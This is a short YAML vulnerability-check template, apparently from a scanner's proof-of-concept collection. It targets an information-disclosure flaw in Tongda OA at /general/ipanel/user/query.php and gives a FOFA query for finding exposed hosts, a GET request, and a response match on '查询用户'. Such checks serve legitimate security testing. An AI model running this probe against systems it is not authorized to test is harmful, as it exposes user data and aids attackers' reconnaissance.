product: 通达OA
vName: 通达OA query.php敏感信息泄漏
type: 信息泄漏
vID: [ ]
level: 3
vDesc: 通达OA general/ipanel/user/query.php存在敏感信息泄漏
version: ''
note: ''
search:
  FOFA: app="TDXK-通达OA"
protocol: http
link: https://www.cnblogs.com/null1433/p/12768901.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /general/ipanel/user/query.php
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 查询用户
            logic: and